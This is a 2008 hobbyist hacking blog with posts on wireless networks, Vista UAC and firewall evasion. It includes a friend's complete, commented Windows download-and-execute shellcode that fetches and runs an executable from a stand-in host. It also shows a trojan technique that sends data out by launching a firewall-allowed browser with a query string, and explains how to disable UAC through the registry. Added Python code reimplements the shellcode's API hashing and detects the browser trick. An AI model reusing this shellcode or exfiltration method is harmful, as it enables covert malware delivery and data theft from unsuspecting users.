Beng Hacks: March 2008

Monday, March 24, 2008

Thank you DL

Hahah, I was smiling as I read DL today (okay, I admit I read DL sometimes, but mostly to laugh!), specifically the wireless article.

Thank you, DL, for telling everyone to boost their signal strength! Even better, please tell everyone to set up a network that supports convergence devices! Everyone knows that most convergence devices (phones, PDAs and the like) can't handle the stronger encryption methods like WPA and WPA2, if they support encryption at all. That means a wireless network in the neighbourhood that caters for convergence devices is most likely to be unsecured (open, or at best WEP).

So... Serangoon, you say... okay, noted!

Sunday, March 16, 2008

Fooling around with Vista

OK, I played with Vista a bit over the weekend. The first thing I noticed, of course, is UAC, User Account Control: every time you install a program you are asked to confirm it, and every app, even under an administrator account, runs with a filtered standard-user token rather than full admin rights. On top of that, if an installed program writes to files (e.g. config files) inside protected folders like Program Files, the original file isn't modified; the write is silently redirected to a per-user copy under %LOCALAPPDATA%\VirtualStore (so-called file virtualization).

BUT BUT BUT

What's this? If you right-click any exe or app, there is an option called "Run as administrator". That elevates the program to the full administrator token (after one consent prompt), so the limited account no longer applies to it. You can also turn UAC off completely, so it never prompts you again, with a single registry value:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System

Under that key, set EnableLUA (a DWORD) to 0! It takes effect after a reboot.

So... what's the bottom line? If it can be done by the user, it can be done programmatically. The catch for malware is that writing that value under HKEY_LOCAL_MACHINE itself needs an elevated process, so it only works after the user has clicked through one prompt: UAC is there to stop silent elevation, not to stop code that is already running as administrator. And you know what, after using it for a while, Vista seems identical to XP/2K, just prettier. I still can't turn on Aero even though my Experience Index is 4.8, grrr. I want my sexy 3D window switching!

And why, oh why, can't I run VC++ 6.0 on Vista?? Thank the heavens for virtualisation.

I was also trying out Vista's "wonderful" volume shrinking feature; yes, you can resize your partitions from inside Vista. Yeah, you WISH! Actually you can only SHRINK existing Vista volumes, and there's a problem: if there are unmovable files in the way, you won't be allowed to shrink past them. For example, if your partition is 80GB and Vista put a System Restore shadow copy, the pagefile or the MFT at the 79GB mark of the HDD, you can only shrink your 80GB partition to 79GB. HAHAHAHA. More bad news: my PartitionMagic can't understand Vista partitions, sob sob, so partition first or suck thumb.

I also discovered a hidden feature by accident (though after googling it's not that new, heheh): if you right-click the right pane of Windows Explorer you can get a Command Prompt opened at that folder. But why only the right pane? Why not add it to the GUI properly? To get away from the Black Screen of Doom? Then why add it at all?

OK, last annoyance I'll write about (or maybe a feature from heaven! Hmmm, should I even write about it~~~)... OK, guess what: now there are TWO places to check what's on your system, under Add/Remove Programs (Programs and Features) in your Control Panel, AND...

in Windows Defender! WTF, under Tools -> Software Explorer, there are tons more apps listed (startup programs, currently running programs and programs with network connections). Hidden! Hehehe, ideas, ideas... so much to learn, so little time...

Thursday, March 13, 2008

Some nice stuff

Courtesy of my friend snooq!

; Author : snooq [http://www.redpuffer.net/snooq/]
; Date : 12 August 2005


; Download-and-execute shellcode: fetches http://hacker.com/a.exe with WinINet,
; writes it to a.exe in the current directory and runs it.

[BITS 32]

; Find the base of kernel32.dll via the PEB:
; fs:[0x30] -> PEB, +0x0c -> PEB_LDR_DATA, +0x1c -> InInitializationOrderModuleList.Flink
; The second entry in that list is kernel32.dll on 2000/XP/2003/Vista (on Windows 7 and
; later it is kernelbase.dll instead, so this trick needs updating there).
mov eax, [fs:0x30]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x1c]
lodsd ; eax -> second list entry
mov esi, [eax + 0x08] ; DllBase of kernel32.dll (+0x08 from InInitializationOrderLinks)

; Push the kernel32 base and the ror13 hashes of the ten imports we need.
; After "mov ebp, esp" below each slot is addressable as [ebp + offset];
; the hash in each slot gets overwritten by the resolved address.
push esi ; kernel32.dll ; [ebp + 0x2c] -> a handy placeholder..
push 0xec0e4e8e ; LoadLibraryA ; [ebp + 0x28]
push 0x16b3fe72 ; CreateProcessA ; [ebp + 0x24]
push 0x60e0ceef ; ExitThread ; [ebp + 0x20]
push 0x7c0017a5 ; CreateFileA ; [ebp + 0x1c]
push 0xe80a791f ; WriteFile ; [ebp + 0x18]
push 0x0ffd97fb ; CloseHandle ; [ebp + 0x14]
push 0xb46984e7 ; HeapCreate ; [ebp + 0x10]
push 0x57e84429 ; InternetOpenA ; [ebp + 0x0c]
push 0x7e0fed49 ; InternetOpenUrlA ; [ebp + 0x08]
push 0x5fe34b8b ; InternetReadFile ; [ebp + 0x04]

push ebp
mov ebp, esp ; [ebp] = saved ebp, [ebp + 4 * n] = slot n

push byte 0x0a ; # of functions to find
pop ecx
L1:
cmp cl, 0x03 ; slots 3..1 live in wininet.dll: load it before resolving them
je Load_WININET

L2:
push dword [ebp + 0x2c] ; dll base (kernel32, later wininet)
push dword [ebp + ecx * 0x04] ; hash of the function in slot ecx
call GetProcAdd
mov [ebp + ecx * 0x04], eax ; replace the hash with the resolved address
loop L1

jmp short Download

Load_WININET:
push ecx
push 0x0074656e ; "net\0"
push 0x696e6977 ; "wini" -> "wininet" on the stack
push esp
call [ebp + 0x28] ; LoadLibraryA("wininet")
mov [ebp + 0x2c], eax ; wininet.dll base is used for the remaining lookups
pop ecx ; discard the string...
pop ecx
pop ecx ; ...and restore the loop counter
jmp short L2

Download:
; Build "a.exe\0http://hacker.com/a.exe\0" on the stack (bytes read upward from esp)
xor ebx, ebx
push ebx ; terminator
push 0x00000065 ; "e\0\0\0"
push 0x78652e61 ; "a.ex"
push 0x2f6d6f63 ; "com/"
push 0x2e72656b ; "ker."
push 0x6361682f ; "/hac"
push 0x2f3a7074 ; "tp:/"
push 0x74680065 ; "e\0ht"
push 0x78652e61 ; "a.ex" -> filename "a.exe" at esp, URL at esp + 6

; HeapCreate(HEAP_GENERATE_EXCEPTIONS, 0x1ffff, 0x3ffff): the returned heap handle is
; the address of the committed region and is used directly as the download buffer
; (no HeapAlloc is ever made on it, so clobbering the heap header does not matter here).
dec ebx ; ebx = 0xffffffff
shr ebx, 0x0e ; ebx = 0x0003ffff -> dwMaximumSize
push ebx
shr ebx, 0x01 ; ebx = 0x0001ffff -> dwInitialSize (also the read size below)
push ebx
push byte 0x04 ; flOptions
call [ebp + 0x10] ; HeapCreate()
mov [ebp + 0x30], eax ; [ebp + 0x30] -> heap handle (scratch slots above the saved kernel32 base)

xor edx, edx
push edx ; dwFlags
push edx ; lpszProxyBypass
push edx ; lpszProxy
push edx ; dwAccessType
push edx ; lpszAgent
call [ebp + 0x0c] ; InternetOpenA()
mov [ebp + 0x34], eax ; session handle

; [ebp - 0x24] -> filename
; [ebp - 0x1e] -> url

mov ecx, esp
add ecx, 0x06 ; ecx -> url
push edx ; dwContext
push edx ; dwFlags
push edx ; dwHeadersLength
push edx ; lpszHeaders
push ecx ; lpszUrl
push dword [ebp + 0x34] ; hInternet
call [ebp + 0x08] ; InternetOpenUrlA()
mov [ebp + 0x34], eax ; [ebp + 0x34] -> HINTERNET

mov ecx, esp ; ecx -> filename
xor edx, edx
push edx ; hTemplateFile
push edx ; dwFlagsAndAttributes
push 0x02 ; CREATE_ALWAYS
push edx ; lpSecurityAttributes
push edx ; dwShareMode
push dword 0x40000000 ; GENERIC_WRITE
push ecx ; lpFileName
call [ebp + 0x1c] ; CreateFile()
mov [ebp + 0x38], eax ; [ebp + 0x38] -> file handle

; A single InternetReadFile of up to 0x1ffff bytes: anything larger is truncated.
mov ecx, ebp
add ecx, 0x3c ; [ebp + 0x3c] -> rlen (bytes read)
push ecx ; lpdwNumberOfBytesRead
push ebx ; dwNumberOfBytesToRead = 0x1ffff
push dword [ebp + 0x30] ; lpBuffer
push dword [ebp + 0x34] ; hFile
call [ebp + 0x04] ; InternetReadFile()

mov ecx, ebp
add ecx, 0x40 ; [ebp + 0x40] -> wlen (bytes written)
xor edx, edx
push edx ; lpOverlapped
push ecx ; lpNumberOfBytesWritten
push dword [ebp + 0x3c] ; nNumberOfBytesToWrite = rlen
push dword [ebp + 0x30] ; lpBuffer
push dword [ebp + 0x38] ; hFile
call [ebp + 0x18] ; WriteFile()

push dword [ebp + 0x38]
call [ebp + 0x14] ; CloseHandle()

mov edx, esp ; edx -> "a.exe", reused as the command line

; Zero 0x54 bytes: PROCESS_INFORMATION (0x10) followed by STARTUPINFOA (0x44)
sub esp, 0x54
lea edi, [esp]
xor eax, eax
push byte 0x15 ; 0x15 dwords = 0x54 bytes
pop ecx
rep stosd

mov byte [esp + 0x10], 0x44 ; si.cb = sizeof(STARTUPINFOA)
lea ebx, [esp + 0x10] ; SI
push esp ; PI -> lpProcessInformation
push ebx ; lpStartupInfo
push eax ; lpCurrentDirectory
push eax ; lpEnvironment
push eax ; dwCreationFlags
push eax ; bInheritHandles
push eax ; lpThreadAttributes
push eax ; lpProcessAttributes
push edx ; lpCommandLine = "a.exe"
push eax ; lpApplicationName
call [ebp + 0x24] ; CreateProcessA()

call [ebp + 0x20] ; ExitThread() (exit code is whatever happens to be on the stack)

; Function to retrieve a function address by walking the module's export table
; Parameters (pushed in this order): dll base, function hash
; Return: function address in eax (undefined if no export matches)

GetProcAdd:
push ecx
push esi

mov esi, [esp + 0x10] ; dll base
mov eax, [esi + 0x3c] ; e_lfanew: offset of the PE header
mov edx, [esi + eax + 0x78] ; Export directory RVA (DataDirectory[0])
add edx, esi ; Export directory address
mov ecx, [edx + 0x18] ; NumberOfNames
mov ebx, [edx + 0x20] ; AddressOfNames RVA
add ebx, esi ; AddressOfNames address

Find:
jecxz Done ; out of names: give up
dec ecx
mov esi, [ebx + ecx * 0x04] ; RVA of the name at index ecx (walking from the last name down)
add esi, [esp + 0x10] ; ptr to current name

xor edi, edi
xor eax, eax
cld

Hash:
lodsb ; Load the next byte from esi into al
test al, al
jz Compare ; Hit the null terminator: the hash is complete
ror edi, 0xd ; Rotate the accumulator 13 bits to the right
add edi, eax ; Add the new byte to the accumulator
jmp short Hash ; Next byte


Compare:
cmp edi, [esp + 0x0c] ; Is this the hash we are looking for?
jnz Find
mov ebx, [edx + 0x24] ; AddressOfNameOrdinals RVA
add ebx, [esp + 0x10] ; AddressOfNameOrdinals address
mov cx, [ebx + ecx * 0x02] ; ordinal for this name index
mov ebx, [edx + 0x1c] ; AddressOfFunctions RVA
add ebx, [esp + 0x10] ; AddressOfFunctions address
mov eax, [ebx + ecx * 0x04] ; function RVA, indexed by ordinal
add eax, [esp + 0x10] ; Function address

Done:
pop esi
pop ecx
ret 0x08

; padding
nop
nop
nop
nop
nop
nop
nop
nop


Can you figure out what it does? :)
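As an added worked example (my own code, not snooq's and not part of the original post), here is the same two-step trick in Python: the ror13 hash from the Hash loop, and the export-table walk from GetProcAdd, run against a constructed in-memory "module" that contains only the PE fields the shellcode reads (e_lfanew at 0x3c, the export directory RVA at PE+0x78, and the NumberOfNames/AddressOfFunctions/AddressOfNames/AddressOfNameOrdinals fields). The module, its three exports and their RVAs are made up; a real on-disk DLL would additionally need file-offset-to-RVA section mapping before this walk applies. The hash constants are the ten the shellcode pushes, so you can check them before reusing them.

```python
import struct


def ror13_hash(name):
    """The shellcode's Hash loop: edi = ror(edi, 13) + byte over the name's bytes (no terminator)."""
    h = 0
    for b in name:                       # name is bytes; the null is tested before rotating, so not hashed
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + b) & 0xFFFFFFFF
    return h


# The constants pushed by the shellcode, keyed by the export each one stands for.
SHELLCODE_HASHES = {
    "LoadLibraryA": 0xEC0E4E8E, "CreateProcessA": 0x16B3FE72, "ExitThread": 0x60E0CEEF,
    "CreateFileA": 0x7C0017A5, "WriteFile": 0xE80A791F, "CloseHandle": 0x0FFD97FB,
    "HeapCreate": 0xB46984E7, "InternetOpenA": 0x57E84429, "InternetOpenUrlA": 0x7E0FED49,
    "InternetReadFile": 0x5FE34B8B,
}


def mismatched_hashes():
    """Names whose constant is not ror13(name); an empty list means the table is consistent."""
    return [n for n, h in SHELLCODE_HASHES.items() if ror13_hash(n.encode()) != h]


def build_fake_module(exports):
    """Constructed stand-in for a loaded DLL: a flat image with only the fields the walk reads.
    exports is a list of (name, function_rva). Ordinals are assigned in reverse order so that
    the AddressOfNameOrdinals indirection actually matters."""
    img = bytearray(0x1000)
    pe, exp = 0x80, 0x200                              # chosen offsets, not from any real DLL
    funcs, names, ords, strings = 0x300, 0x340, 0x380, 0x400
    struct.pack_into("<I", img, 0x3C, pe)              # e_lfanew
    img[pe:pe + 4] = b"PE\0\0"
    struct.pack_into("<I", img, pe + 0x78, exp)        # DataDirectory[0].VirtualAddress (exports)
    n = len(exports)
    struct.pack_into("<I", img, exp + 0x14, n)         # NumberOfFunctions
    struct.pack_into("<I", img, exp + 0x18, n)         # NumberOfNames
    struct.pack_into("<I", img, exp + 0x1C, funcs)     # AddressOfFunctions
    struct.pack_into("<I", img, exp + 0x20, names)     # AddressOfNames
    struct.pack_into("<I", img, exp + 0x24, ords)      # AddressOfNameOrdinals
    cursor = strings
    for i, (name, rva) in enumerate(exports):
        ordinal = n - 1 - i
        struct.pack_into("<I", img, funcs + 4 * ordinal, rva)
        struct.pack_into("<I", img, names + 4 * i, cursor)
        struct.pack_into("<H", img, ords + 2 * i, ordinal)
        raw = name.encode() + b"\0"
        img[cursor:cursor + len(raw)] = raw
        cursor += len(raw)
    return bytes(img)


def resolve_by_hash(image, wanted):
    """GetProcAdd in Python: walk AddressOfNames from the last entry down, hash each name and,
    on a match, go name index -> ordinal -> AddressOfFunctions entry. Returns the RVA (the
    shellcode adds the module base to get a VA) or None if no export matches."""
    u32 = lambda off: struct.unpack_from("<I", image, off)[0]
    u16 = lambda off: struct.unpack_from("<H", image, off)[0]
    exp = u32(u32(0x3C) + 0x78)
    count, functions = u32(exp + 0x18), u32(exp + 0x1C)
    names, ordinals = u32(exp + 0x20), u32(exp + 0x24)
    for i in range(count - 1, -1, -1):
        name_rva = u32(names + 4 * i)
        name = image[name_rva:image.index(b"\0", name_rva)]
        if ror13_hash(name) == wanted:
            return u32(functions + 4 * u16(ordinals + 2 * i))
    return None


# Constructed sample module with three exports in the sorted order a linker would emit.
SAMPLE_MODULE = build_fake_module([("CloseHandle", 0x1010), ("LoadLibraryA", 0x2020), ("WriteFile", 0x3030)])

if __name__ == "__main__":
    print("constants that are not ror13(name):", mismatched_hashes())
    for name in ("LoadLibraryA", "WriteFile", "GetProcAddress"):
        h = ror13_hash(name.encode())
        print(f"{name:16s} {h:#010x} -> RVA {resolve_by_hash(SAMPLE_MODULE, h)}")
```

Two things worth noticing: the walk scans names from the last entry backwards, so of two exports with colliding hashes the later one wins (ror13 is a convenience hash, not a collision-resistant one), and nothing here touches ntdll or the PEB, so it runs anywhere; the only Windows-specific part of the shellcode is the InInitializationOrderModuleList trick used to find kernel32 in the first place.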

Tuesday, March 11, 2008

Command-line Internet access

Everyone who has half a brain uses a firewall. Even M$ gives you a free (but kind of useless) one called Windows Firewall (still Windows Firewall on Vista; Windows Defender is the anti-spyware tool, not the firewall). However, most software firewalls like ZoneAlarm are application firewalls first, meaning they block or allow based on which application is trying to get access, not on where it is going. What are the first applications you allow through the firewall? IEXPLORE.EXE (Internet Explorer), FIREFOX.EXE (Mozilla Firefox) and OPERA.EXE (Opera).

Did you know it's possible to use these executables to reach the internet without you knowing? No firewall popup, no prompt, nothing. Because your firewall already allowed them, it has no reason to tell you the internet was being accessed. (A naive launch like the one below does flash up a browser window; a real trojan would start it hidden, but the firewall sees nothing different either way.)

For example: C:\Progra~1\Intern~1\iexplore.exe http://mybackdoorhost.domain.com/formcollector.php?name=value&

This fires up IEXPLORE from the command line and hits a web form on my website with the data carried in the query string. (The 8.3 short names, Progra~1 and Intern~1, just save quoting the spaces in "Program Files".) If I had a trojan on your PC, my EXE need only run this command line to ship info from you. No need to write HTTP or FTP code, just use IEXPLORE, and the best part: since you already allow it through the firewall, I don't even need to worry about hooking into it or anything like that.

Wonderful, right? Think you're safe? Think again!!

So what's the solution here? Hard to say, really. How do you block a possible trojan like this yet allow yourself internet access? You can't say "don't use iexplore, use firefox instead", because the trojan can try both. A plain application firewall looks at the process opening the connection, not at which process started it, so a browser launched by a trojan looks exactly like a browser launched by you. Frankly, the IT systems we normal people use today (Windows) are totally inadequate to prevent such attacks. All of us are vulnerable to this, regardless, unless you tell me you don't use the internet.

One possible solution is to change your internet surfing habits. Use an old PC running Linux, or a Mac, for your internet surfing, personal email and confidential stuff, AND never download files to or plug thumbdrives into that PC. Then have another PC for your online gaming and chat and stuff. It only lessens the damage, but lessening is still something.

How about Vista? Sadly, I don't know, but I suspect UAC on Vista *can* help in this regard. Still exploring it on my *ahem* copy; I'll keep you posted.
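To show what an application firewall alone misses, here is an added example in Python (my own, not from the original post): detection logic over constructed process-creation events of the kind Sysmon or an EDR records (Image, ParentImage, CommandLine). Process 2044 is the page's own command line with a made-up parent in a Temp folder; the other three lines, the process IDs and the 203.0.113.10 host are invented for contrast. The rule flags a browser started by anything other than the shell or another browser, or handed a URL with a query string or an IP-literal host, which is the signature of the trick described above.

```python
import re
import ntpath
from urllib.parse import urlsplit

# Browsers the post names as the usual firewall-allowed executables.
BROWSERS = {"iexplore.exe", "firefox.exe", "opera.exe"}
# Parents from which a browser start is ordinary: the shell (the user clicked) or the browser itself.
EXPECTED_PARENTS = {"explorer.exe"} | BROWSERS
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")

# Constructed process-creation events, Sysmon event 1 style fields, one event per line,
# '|' separated. Only 2044's command line comes from the post; everything else is made up.
SAMPLE_EVENTS = """\
ProcessId=1880|Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine="C:\\Program Files\\Mozilla Firefox\\firefox.exe"
ProcessId=1912|Image=C:\\Program Files\\Internet Explorer\\iexplore.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine="C:\\Program Files\\Internet Explorer\\iexplore.exe" http://www.example.com/
ProcessId=2044|Image=C:\\Program Files\\Internet Explorer\\iexplore.exe|ParentImage=C:\\Users\\beng\\AppData\\Local\\Temp\\update.exe|CommandLine=C:\\Progra~1\\Intern~1\\iexplore.exe http://mybackdoorhost.domain.com/formcollector.php?name=value&
ProcessId=2100|Image=C:\\Program Files\\Opera\\opera.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|CommandLine=opera.exe http://203.0.113.10/c.php?h=BENGPC&u=beng
"""


def parse_events(text):
    """Turn the key=value lines into dicts; only the first '=' splits, so URLs containing '=' survive."""
    events = []
    for line in text.splitlines():
        if line.strip():
            events.append(dict(field.split("=", 1) for field in line.split("|")))
    return events


def flag_event(ev):
    """Reasons this launch looks like a non-browser process proxying a request through a browser."""
    image = ntpath.basename(ev["Image"]).lower()
    if image not in BROWSERS:
        return []
    reasons = []
    parent = ntpath.basename(ev["ParentImage"]).lower()
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"browser spawned by {parent}")
    for url in URL_RE.findall(ev.get("CommandLine", "")):
        parts = urlsplit(url)
        if parts.query:                                   # data leaving in the query string
            reasons.append(f"query string on the command line: {url}")
        if parts.hostname and IPV4_RE.fullmatch(parts.hostname):
            reasons.append(f"IP-literal host: {parts.hostname}")
    return reasons


def find_proxied_launches(text):
    """Map ProcessId -> reasons for every event that raised at least one flag."""
    hits = {}
    for ev in parse_events(text):
        reasons = flag_event(ev)
        if reasons:
            hits[int(ev["ProcessId"])] = reasons
    return hits


if __name__ == "__main__":
    for pid, reasons in find_proxied_launches(SAMPLE_EVENTS).items():
        print(pid, *reasons, sep="\n    ")
```

The parent/child relationship is exactly the signal an application firewall lacks: iexplore.exe opening a socket looks the same whether a user clicked a link or a dropper called CreateProcess. Tune EXPECTED_PARENTS for mail and chat clients that legitimately open the default browser, and treat a hit as a lead rather than proof: a trojan can just as well inject into the browser that is already running, which leaves no new process to flag.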